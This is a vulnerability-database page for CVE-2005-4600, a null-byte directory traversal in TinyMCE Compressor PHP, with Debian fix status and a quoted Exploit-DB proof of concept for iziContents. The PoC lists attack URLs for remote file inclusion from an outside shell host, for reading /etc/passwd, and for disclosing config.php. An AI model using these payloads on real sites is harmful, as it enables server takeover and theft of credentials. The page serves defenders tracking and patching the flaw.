VIR Vulnerability Intelligence Relay

CVE-2005-4600

unknown
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

Directory traversal vulnerability in tiny_mce_gzip.php in TinyMCE Compressor PHP before 1.06 allows remote attackers to read or include arbitrary files via a trailing null byte (%00) in the (1) theme, (2) language, (3) plugins, or (4) lang parameter.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-4441 webapps php verified text · 2 KB
irk4z · 2007-09-21

iziContents rc6 - Local/Remote File Inclusion

text exploit Source: Exploit-DB 
#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities          #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.izicontents.com/download/iziContents1RC6.zip                    #
#                                                                              #
# greetz: cOndemned, kacper ;>                                                 #


# remote file inclusion:
 http://[site]/[path]/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://[shell]? 
 
# local file inclusion:
 http://[site]/[path]/modules/poll/poll_summary.php?rootdp=zZz&admin_home=/etc/passwd%00
 http://[site]/[path]/include/db.php?rootdp=/etc/passwd%00
 
# remote file disclosure:
 http://[site]/[path]/include/tinymce/tiny_mce_gzip.php?theme=../../config.php%00

# milw0rm.com [2007-09-21]

OS impact
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 2.5.1-3
sid Fixed 2.5.1-3
forky Fixed 2.5.1-3
bullseye Fixed 2.5.1-3
bookworm Fixed 2.5.1-3

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.